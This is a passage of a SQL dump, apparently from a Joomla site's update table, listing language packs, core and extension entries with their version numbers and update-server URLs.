US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2250,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2251,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2252,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2253,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2254,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2255,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2256,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2257,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2258,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2259,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2260,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2261,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2262,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2263,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2264,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2265,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2266,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2267,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2268,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2269,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2270,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2271,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(2272,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2273,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2274,3,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2275,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2276,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2277,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2278,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2279,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2280,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2281,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2282,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2283,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2284,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2285,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2286,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2287,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2288,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2289,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2290,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2291,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2292,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2293,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2294,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2295,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2296,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2297,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2298,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2299,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2300,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2301,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2302,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2303,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2304,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2305,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2306,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2307,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2308,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2309,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2310,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2311,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2312,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2313,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2314,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2315,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(2316,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(2317,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(2318,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2319,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2320,57,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2321,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2322,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2323,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2324,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2325,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2326,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2327,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2328,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2329,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2330,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2331,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2332,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2333,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2334,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2335,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2336,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2337,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2338,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2339,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2340,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2341,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2342,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2343,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2344,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2345,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2346,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2347,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2348,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2349,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2350,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2351,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2352,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2353,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2354,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2355,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2356,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2357,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2358,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2359,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2360,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2361,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(2362,1,0,'Joomla','','joomla','file','',0,'3.9.9','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2363,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2364,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2365,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2366,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2367,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2368,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2369,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2370,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2371,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2372,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2373,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2374,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2375,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2376,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2377,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2378,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2379,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2380,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2381,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2382,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2383,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2384,3,0,'French','','pkg_fr-FR','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2385,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2386,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2387,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2388,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2389,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2390,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2391,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2392,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2393,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2394,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2395,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2396,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2397,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2398,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2399,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2400,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2401,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2402,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2403,3,0,'English US','','pkg_en-US','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2404,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2405,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2406,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2407,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2408,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2409,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2410,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2411,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2412,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2413,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2414,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2415,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2416,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2417,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2418,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2419,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2420,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2421,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2422,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2423,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2424,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2425,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2426,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(2427,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(2428,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(2429,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2430,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2431,57,0,'French','','pkg_fr-FR','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2432,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2433,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2434,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2435,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2436,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2437,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2438,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2439,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2440,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2441,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2442,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2443,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2444,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2445,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2446,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2447,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2448,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2449,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2450,57,0,'English US','','pkg_en-US','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2451,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2452,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2453,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2454,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2455,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2456,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2457,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2458,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2459,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2460,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2461,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2462,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2463,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2464,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2465,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2466,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2467,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2468,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2469,57,0,'German 